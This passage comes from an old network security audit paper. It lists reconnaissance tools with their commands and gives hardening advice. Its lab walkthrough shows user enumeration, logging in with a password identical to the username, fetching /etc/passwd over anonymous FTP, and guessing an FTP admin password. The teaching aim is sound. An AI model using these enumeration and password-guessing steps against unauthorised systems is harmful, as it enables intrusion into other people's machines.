  1955. and usage.  $lab-1> smbclient -L WWW -I 192.168.2.3
  1956.  
  1957. whois $ whois whitehouse.gov@whois.arin.net traceroute $ traceroute
  1958. www.freebsd.org dig $ dig maine.edu @192.168.172.123 axfr snmpwalk Use snmpwalk
  1959. to query the snmp server on a remote host.  This protocol is probably less
  1960. commonly thought of as an information gathering tool.  It is a powerful one
  1961. however.  $lab-1> snmpwalk 192.168.2.3 public system
  1962.  
  1963. nss Narrow Security Scanner.  hostfiles is file containing a list of ip
  1964. addresses that you are scanning.
  1965.  
  1966. ./scanner  hostfiles vulnerable-log
  1967.  
  1968. Nessus Nessus is a security auditing program that can scan an entire class A
  1969. subnet for multiple DoS attacks, exploits and mis-configurations.  It runs in to
  1970. parts a client and server type application is used where all scanning functions
  1971. are done by the server which are controlled by the client. Nessus scans for many
  1972. modern security issues such as Windows vulnerabilities and various Unix
  1973. exploits.  The command is as follows:  # ./nessusd & # ./nessus &
  1974.  
  1975. must issue an xhost command on connecting host.
  1976.  
  1977. rpcinfo Display information on remote procedures being offered.  $ rpcinfo -p
  1978. hostname
  1979.  
  1980. showmount Display information on remote NFS mounts.  $ showmount -e hostname
  1981.  
  1982. mail bounce An attempt to gather information on a remote host by bouncing a bad
  1983. email off of the server and examining the header information.  $ mail -s"test"
  1984. jkhshjkd@hostname.com test message please ignore
  1985. .  
  1986.  
  1987.  
  1988. nmap This is a network mapping package that is capable of stealth scanning and
  1989. OS finger printing.  I will attempt to explain these concepts to those of you
  1990. who are unfamiliar with them.  Stealth scanning: A normal TCP connection
  1991. consists of a 3 way hand shake in order to connect to the other host, this
  1992. software doesn't complete that 3 way hand shake in order to hide its attempts at
  1993. information gathering. 
  1994.  
  1995. OS finger printing: Mangled packets are sent in different sequences at the
  1996. target host and depending on the target hosts reaction a guess is made as to
  1997. what that host is running for an OS based on a table of known reactions. 
  1998.  
  1999. # ./nmap -O -sS 192.168.0.*
  2000.  
  2001.  
  2002. sscan Sscan is a rewrite of mscan. They are vulerability scanning tools that are
  2003. capable of scanning a large block of ip addresses searching for known
  2004. vulnerabilities like, Qpop, IMAP, DNS, cgi-bin/phf etc.  # ./sscan -o
  2005. 192.168.3.28
  2006.  
  2007.  
  2008. VII. Locking down the house Shut down all unneeded services.  Remove all
  2009.  unwanted packages.  Web server? don't need X, GCC, Sendmail etc... Mail server?
  2010.  don't need apache, GNOME, GCC etc...  Look through vulnerability archives like
  2011.  packetstorm for existing exploits.  Search for your
  2012.  OS/Software/Services/Packages etc.. Patch accordingly.  Audit your setuid
  2013.  binaries. find / -perm -4000 > setuid-DATESTAMP store this off-line somewhere. 
  2014.  Install tripwire but don't rely on this alone.  Watch your logs keep a close
  2015.  eye on the system as a whole.  Mount certain partitions Read only like /usr. 
  2016.  Under linux you can do a mount /dev/hda2 /usr remount,ro see the man page for
  2017.  more details.  Join Email lists like CERT, CIAC,Bugtraq and lists specific to
  2018.  your vendors.  Limit local accounts to root and a manager account.  Passwords
  2019.  really secure passwords.  Something you can pronounce so you can remember it,
  2020.  but with no real words. minimum of 7 characters. Rudi^b@1 -->>> Rudy Carrot bat
  2021.  one.  Limit services, don't run tons of plugs and proxies on your firewall.  It
  2022.  soon becomes a proxy server once you add that AOL IM Proxy, Real audio and
  2023.  NNTP.  Use filtering either tcp wrappers or like linux and freeBSD you can use
  2024.  ipchains and ipfw to drop unwanted packets.  try to break into your own
  2025.  network.  BUT make sure you have permission in writing, and notify networking
  2026.  personnel and management.  This could even cause them to secure the boxes
  2027.  before hand.  Which will not give an accurate security assessment but at least
  2028.  it moved you in the right direction.  Always maintain patch levels and version
  2029.  levels of your services, like bind and sendmail.  Only allow zone transfers and
  2030.  queries by your network and its trusted hosts (i.e. secondary DNS).  VIII.
  2031.  Interpretation and Sorting
  2032.  
  2033. This section is still being completed.  In this section I have examples of
  2034. output from various packages and I will point out significant tid bits of
  2035. information.  These are actual logs of what information I was able to find on
  2036. some test systems.  My comments are in red.
  2037.   
  2038.  
  2039. # ./nmap -sT 192.168.18.6
  2040.  
  2041. Starting nmap V. 2.3BETA5 by Fyodor (fyodor@dhp.com, www.insecure.org/nmap/)
  2042. Interesting ports on 192.168.18.6 Port State Protocol Service 7 filtered tcp
  2043. echo 19 filtered tcp chargen 25 open tcp smtp 111 open tcp sunrpc 800 open tcp
  2044. mdbs_daemon 844 open tcp unknown 1030 open tcp iad1 1521 open tcp ncube-lm 2001
  2045. open tcp dc 12345 filtered tcp NetBus 12346 filtered tcp NetBus
  2046.  
  2047. Nmap run completed -- 1 IP address (1 host up) scanned in 13 seconds
  2048.   
  2049.  
  2050. Looks like a database (port 800), so why run all of these other services?  If
  2051. you dont need them shut them down.
  2052.   
  2053.  
  2054. $> snmpwalk 192.168.18.6 public system
  2055.  
  2056. Timeout: No Response from 192.168.18.6
  2057.  
  2058. No snmp daemons running.
  2059.   
  2060.  
  2061. [bewhaw ~] $ rpcinfo -p 192.168.18.6
  2062.  
  2063.    program vers proto port service 100000 3 udp 111 rpcbind 100000 2 udp 111
  2064.     rpcbind 100000 3 tcp 111 rpcbind 100000 2 tcp 111 rpcbind 100024 1 udp 842
  2065.     status 100024 1 tcp 844 status 100021 1 udp 2049 nlockmgr 100021 3 udp 2049
  2066.     nlockmgr 100021 4 udp 2049 nlockmgr 391004 1 tcp 1025 391004 1 udp 1025
  2067.     100001 1 udp 1026 rstatd 100001 2 udp 1026 rstatd 100001 3 udp 1026 rstatd
  2068.     100008 1 udp 1027 walld 100002 1 udp 1028 rusersd 100011 1 udp 1029 rquotad
  2069.     100012 1 udp 1030 sprayd 100026 1 udp 1031 bootparam 391011 1 tcp 1026
  2070.     391002 1 tcp 1027 100083 1 tcp 1028 100003 2 udp 2049 nfs 100003 3 udp 2049
  2071.     nfs 150001 1 udp 797 pcnfsd 150001 2 udp 797 pcnfsd 150001 1 tcp 800 pcnfsd
  2072.     150001 2 tcp 800 pcnfsd
  2073.   
  2074.  
  2075. Hmm lets check for nfs, I dont see mountd though.
  2076.  
  2077. [brewhaw ~] lwcashd $ showmount -e 192.168.18.6
  2078.  
  2079. showmount: 192.168.18.6: RPC: Program not registered
  2080.  
  2081. Nope, no exported file systems.  Fix: Again shutdown all uneeded services.
  2082.   
  2083.  
  2084. [muffin ~] $ telnet 192.168.18.6 25
  2085.  
  2086. Trying 192.168.18.6...  Connected to 192.168.18.6.  Escape character is '^]'. 
  2087. 220- mail Sendmail 950413.SGI.8.6.12/950213.SGI.AUTOCF ready at Tue, 7 Dec 1999
  2088. 13:52:49 -0500 220 ESMTP spoken here vrfy root 250 Super-User <root@mail> expn
  2089. root 250 Super-User <root@mail>
  2090.   
  2091.  
  2092. Hmm IRIX 6.2 I'd guess as 8.6.12 is pretty old sendmail. It also is running with
  2093. vrfy and expn functional they can be used to guess valid user accounts.  Fix:
  2094. Upgrade sendmail.
  2095.  
  2096. Lets try another system, this time we will try to be sneaky.
  2097.  
  2098. [pangea ]$ snmpwalk test-03 public system
  2099.  
  2100. system.sysDescr.0 = Sun SNMP Agent, Ultra-Enterprise system.sysObjectID.0 = OID:
  2101. enterprises.42.2.1.1 system.sysUpTime.0 = Timeticks: (13902714) 1 day,
  2102. 14:37:07.14 system.sysContact.0 = System administrator system.sysName.0 =
  2103. test-03 system.sysLocation.0 = System administrators office system.sysServices.0
  2104. = 72
  2105.   
  2106.  
  2107. #./nmap -sF 192.168.1.1
  2108.   
  2109.   
  2110.  
  2111. This snmp call was successful, sometimes we can discover the OS version and
  2112. patch level this way.  Fix: Disable snmp by removing the snmp daemon from your
  2113. startup scripts.
  2114.  
  2115. [pangea ~] lwcashd $ finger @192.168.7.21 [192.168.7.21] connect: Connection
  2116. refused
  2117.  
  2118. Hmm, finger is not running so we cant get a user list that way.. lets try
  2119. another method.
  2120.  
  2121. [pangea ~] lwcashd $ rpcinfo -p 192.168.7.21 program vers proto port service
  2122.    100000 4 tcp 111 rpcbind 100000 3 tcp 111 rpcbind 100000 2 tcp 111 rpcbind
  2123.    100000 4 udp 111 rpcbind 100000 3 udp 111 rpcbind 100000 2 udp 111 rpcbind
  2124.    100002 1 udp 32770 rusersd 100002 2 udp 32770 rusersd 100021 1 udp 32776
  2125.    nlockmgr 100021 2 udp 32776 nlockmgr 100021 3 udp 32776 nlockmgr 100021 4 udp
  2126.    32776 nlockmgr 100021 1 tcp 32772 nlockmgr 100021 2 tcp 32772 nlockmgr 100021
  2127.    3 tcp 32772 nlockmgr 100021 4 tcp 32772 nlockmgr 1342177279 3 tcp 35567
  2128.    1342177279 1 tcp 35567 1342177280 3 tcp 36146 1342177280 1 tcp 36146
  2129.  
  2130. Hmm rusers is running lets see what that gives us.
  2131.  
  2132. [pangea ~] lwcashd $ rusers -l 192.168.7.21 www 192.168.7.21:tty0 Jan 18 11:22
  2133. 5:54 www 192.168.7.21:tty0 Jan 18 15:09 5:54
  2134.   
  2135.  
  2136. We now know of one login on our target www which sometimes has easy to guess
  2137. passwords for web maintenance.
  2138.  
  2139.     If a service is vital to your server be sure and get information on previous
  2140. bugs and patches.  Getting the latest version isnt always the answer as new
  2141. features might introduce new bugs its better to keep track of the latest
  2142. modifications to the new version and upgrade accordingly.  For example if their
  2143. are no known vulnerabilies and the latest version adds more bells and whistles
  2144. you might want to wait a while before upgrading.  This way the software package
  2145. has time to be poked and prodded by system administrators and security
  2146. personnel.
  2147.  
  2148.     Enough dry reading already lets see how much information we can gather on
  2149. our target with these tools. Our target is a High School web server. The box is
  2150. hosted by the school off of a state edu connection. The box is actually one of
  2151. my lab machines that I configured in the same exact way the server I audited
  2152. was. All of the examples in this paper will be lab machines setup to depict
  2153. examples as I have seen them in the wild.
  2154.  
  2155. Nmap Scan:  For usage see the tools section.
  2156.  
  2157. [root@Diabolic nmap-2.3BETA6]# ./nmap -O -sX 192.168.15.19
  2158.  
  2159. Starting nmap V. 2.3BETA6 by Fyodor (fyodor@dhp.com, www.insecure.org/nmap/)
  2160. Interesting ports on dt065ndb.maine.rr.com (192.168.15.19):
  2161.  
  2162. Port State Protocol Service 23 open tcp telnet 25 open tcp smtp 80 open tcp http
  2163. TCP Sequence Prediction: Class=truly random Difficulty=9999999 (Good luck!)
  2164. Remote operating system guess: Linux 2.0.35-37
  2165.  
  2166. Nmap run completed -- 1 IP address (1 host up) scanned in 4 seconds
  2167.  
  2168. Our target host is running a web server and telnet for remote administration.
  2169. They probably feel that the server is somewhat secure because they have shutdown
  2170. most of the services. The next step is to fire up a web browser and see what
  2171. they have for site content. <screen dump?>
  2172.  
  2173. What I am looking for is any information that will get me what accounts exist on
  2174. the target and whom they belong to. I find to be what I consider half of the
  2175. password file HTMLized and up for display, a contact page. I don't really know
  2176. if the accounts on the contact page are local or alias to a mail server
  2177. internally. I assume its all local accounts as most school admins aren't ready
  2178. to setup a split horizon DNS with a smart relaying sendmail configuration.
  2179.  
  2180. The contact page is generally a list of email addresses for that site of about
  2181. ten to fifteen teachers, staff and even the webmaster. I guess that the
  2182. principals secretary might be a good candidate for a password guessing attack
  2183. and try the following.
  2184.  
  2185. Trying 192.168.15.19...  Connected to 192.168.15.19.  Escape character is '^]'.
  2186.  
  2187. Red Hat Linux release 5.2 (Apollo) Kernel 2.0.36 on an i486 login: jsmith
  2188. Password:jsmith<enter> [jsmith@dt065ndb jsmith]$
  2189.  
  2190. Woops, they are local accounts and poorly passworded as I suspected. As nmap
  2191. revealed this is a linux box. Redhat 5.2 to be specific and trivial to locate an
  2192. exploit to get root. At this stage the game is all over. With minimal
  2193. information gathering, nmap scan and web mining we were able to gain access to
  2194. our target. If they had mail handled elsewhere, limited local accounts to root
  2195. and 1 admin user with good passwords this wouldn't have happened. (entries in
  2196. hosts.allow/deny wouldn't have killed them either)
  2197.  
  2198. More electronic dumpster diving with ftp.
  2199.  
  2200. [pangea /tmp] $ ftp 192.168.41.29
  2201.  
  2202. Connected to zig.internal.net.  220 zig FTP server (UNIX(r) System V Release
  2203. 4.0) ready.  Name (zig.internal.net:security): anonymous 331 Guest login ok,
  2204. send ident as password.  Password:  230 Guest login ok, access restrictions
  2205. apply.  ftp> cd etc 250 CWD command successful.  ftp> get passwd 200 PORT
  2206. command successful.  150 ASCII data connection for passwd (192.168.12.2,33793)
  2207. (523 bytes).  226 ASCII Transfer complete.  local: passwd remote: passwd 538
  2208. bytes received in 0.0059 seconds (89 Kbytes/s)
  2209.  
  2210. Ok, grabbing the password file isnt so steathly.  But I want to check to see if
  2211. they screwed up at all.
  2212.  
  2213. $> tail -n1 passwd ftpadm:x:1113:1000::/home/ftpadm:/bin/csh
  2214.  
  2215. Yes, they have screwed up this is possibly (if the passwd file is not out of
  2216. date) a local user account with a vaild shell.
  2217.  
  2218. [muffin /tmp] $ ftp 192.168.41.29
  2219.  
  2220. Connected to zig.internal.net.  220 zig FTP server (UNIX(r) System V Release
  2221. 4.0) ready.  Name (zig.internal.net:security): ftpadm 331 Password required for
  2222. ftpadm.  Password: (ftpadm1) 230 User ftpadm logged in.  ftp>
  2223.  
  2224. First try.  Probably the second worst password you could have besides ftpadm. 
  2225. Dangerous combinations
  2226.  
  2227. SSH and NFS, if you are exporting a home directory to the world which is a big
  2228. no-no an attacker can append their identity.pub file in your authorized_keys
  2229. file.  This will allow them to login with their login password.  You really
  2230. shouldnt need to export a file system off of a system on the internet.  I would
  2231. move the NFS server into the internal network and share out the filesystem to s
  2232. specific list of hosts or networks. Also besides clamping down on NFS add tcp
  2233. wrappers to your SSH daemon, it can be run from inetd with sshd's -i option. 
  2234. WWW with telnet/ssh.  Be sure if you list contacts and email addresses that none
  2235. of them reside locally on the web server.  If they do then you just gave out
  2236. half of your password file. A list of contacts is a list of logins.  An
  2237. anonymous ftp site with write able directories and / or sensitive material. This
  2238. is becomes an electronic form of dumpster diving.  Old emails, software
  2239. packages, sensitive files etc..  snmp and samba, snmp can be used to get the
  2240. netbios/machine name.  Then samba can be probed for shares.  Sharing an
  2241. uploadable ftp directory with a webserver. Scripts can be uploaded and executed
  2242. remotely through the webserver. (PHP,ASP,PERL,SHTML etc..) Sorting /
  2243. Organization Logs are normally kept in flat text files, this make them easy to
  2244. manage and sort. Depending on how savvy you are you might want to create
  2245. database or store them in comma delimited format. I organize log files using the
  2246. following directory structure.  Network -----> Hostname -----> nmap_output
  2247. -----> showmount -e output -----> snmpwalk_output ..etc..
  2248.   
  2249.  
  2250. I suggest logging problems by network, OS, Vulnerability,hostname.
  2251.  
  2252.                                     192.168.0 ------> IRIX
  2253.                                                       ------>
  2254.                                                              open_lp_account
  2255.                                                              192.168.0.23
  2256.                                                              192.168.0.64
  2257.                                                              192.168.0.203
  2258.  
  2259.                   This way with each directory change you get more detail.
  2260.   
  2261.   X. Resources
  2262.  
  2263. Web.
  2264.  
  2265. Security mailing list and announcements http://www.cert.org Massive security
  2266. site, hosts bugtraq and other security forums.  http://www.securityfocus.com
  2267. Probably the biggest security archive out there. http://packetstorm.securify.com
  2268. Underground news and information http://www.hackernews.com A searchable index of
  2269. RFCs, FAQs and electronic books. http://www.faqs.org/ IBM Bookmanager Book
  2270. server. http://www.s390.ibm.com:80/bookmgr-cgi/bookmgr.cmd/print?book=bk8p7001
  2271. The nessus project (free network security scanning tool ) http://www.nessus.org
  2272. nmap OS detecting scanner. http://www.insecure.org
  2273.  
  2274.   Papers
  2275.  
  2276. Holbrook. P, (1991). Site Security Handbook [Online], Available:
  2277. http://www.cis.ohio-state.edu/htbin/rfc/rfc1244.html [1997, December 20]. 
  2278. Pethia. R, (1991). Guidelines for the Secure Operation of the Internet [Online],
  2279. Available: http://www.cis.ohio-state.edu/htbin/rfc/rfc1281.html [1997, December
  2280. 20].
  2281.  
  2282. Farmer. D and Venema. W, (No Date). Improving the security of your site by
  2283. breaking into it [Online],
  2284. Available:http://www.deter.com/unix/papers/improve_by_breakin.html [1998,
  2285. January].
  2286.  
  2287. Bellovin. S. M, (1993). Packets found on an internet [Online],Available:
  2288. http://www.deter.com/unix/papers/packets_found_bellovin.ps.gz [1998, January].
  2289.  
  2290. Bacic. E. M, (No Date). UNIX & Security [Online], Available:
  2291. http://manitou.cse.dnd.ca/papers/Unix_Sec.html [1998, January].
  2292.  
  2293. Smith. N. P, (1997). Stack Smashing Vulnerabilities in the UNIX operating system
  2294. [Online], Available:
  2295. http://millcomm.com/~nate/machines/security/stack-smashing/[1998, Febuary]. 
  2296.  
  2297. Fydor, (1998) Remote OS detection via TCP/IP Stack Finger Printing [Online],
  2298. Available: http://www.insecure.org/nmap/nmap-fingerprinting-article.html
  2299.  
  2300. +==============================================================================+
  2301. | Get The Latest Issues                                                        |
  2302. |                            Join the Mailing List                             |
  2303. |                            ---------------------                             |
  2304. | E-mail hd-request@hackersdigest.com with the word subscribe in the           |
  2305. | subject line.                                                                |
  2306. +==============================================================================+
  2307.                              www.hackersdigest.com
  2308.  
  2309.      
  2310.  
  2311.  
  2312.